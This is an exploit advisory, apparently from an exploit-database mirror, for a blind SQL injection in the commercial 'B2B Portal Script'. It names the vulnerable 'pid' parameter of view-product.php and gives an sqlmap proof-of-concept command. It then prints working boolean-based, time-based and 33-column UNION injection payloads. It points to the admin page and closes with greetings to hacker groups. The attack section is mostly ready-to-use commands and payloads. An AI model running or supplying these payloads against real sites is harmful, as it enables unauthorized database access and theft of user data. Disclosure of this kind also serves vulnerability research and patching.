cd9e638108
12 new exploits phpBB 2.0.10 - Remote Command Execution (CGI) Advance MLM Script - SQL Injection Picosafe Web Gui - Multiple Vulnerabilities Witbe - Remote Code Execution PHP Classifieds Rental Script - Blind SQL Injection B2B Portal Script - Blind SQL Injection MLM Unilevel Plan Script v1.0.2 - SQL Injection Just Dial Clone Script - SQL Injection Comodo Dragon Browser - Unquoted Service Path Privilege Escalation Billion Router 7700NR4 - Remote Command Execution Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation Exagate WEBPack Management System - Multiple Vulnerabilities
61 lines
No EOL
3.7 KiB
Text
Executable file
61 lines
No EOL
3.7 KiB
Text
Executable file
[x]========================================================================================================================================[x]
|
|
| Title : B2B Portal Script Blind SQL Vulnerabilities
|
|
| Software : B2B Portal Script
|
|
| Vendor : http://www.i-netsolution.com/
|
|
| Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
|
|
| Date : 06 October 2016
|
|
| Author : OoN_Boy
|
|
[x]========================================================================================================================================[x]
|
|
|
|
|
|
|
|
[x]========================================================================================================================================[x]
|
|
| Technology : PHP
|
|
| Database : MySQL
|
|
| Price : $ 249
|
|
| Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
|
|
is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
|
|
portals to manage their online transactions with efficiency
|
|
[x]========================================================================================================================================[x]
|
|
|
|
|
|
[x]========================================================================================================================================[x]
|
|
| Exploit : http://localhost/advancedb2b/view-product.php?pid=294'
|
|
| Aadmin Page : http://localhost/[path]/admin/index.php
|
|
[x]========================================================================================================================================[x]
|
|
|
|
|
|
|
|
[x]========================================================================================================================================[x]
|
|
| Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
|
|
[x]========================================================================================================================================[x]
|
|
|
|
---
|
|
Parameter: pid (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
|
|
|
|
Type: UNION query
|
|
Title: Generic UNION query (NULL) - 33 columns
|
|
Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
|
|
---
|
|
|
|
|
|
[x]========================================================================================================================================[x]
|
|
|
|
|
|
|
|
[x]========================================================================================================================================[x]
|
|
| Greetz : antisecurity.org batamhacker.or.id
|
|
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
|
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
|
[x]========================================================================================================================================[x]
|
|
|
|
[x]========================================================================================================================================[x]
|
|
| Hi All long time no see ^_^
|
|
[x]========================================================================================================================================[x] |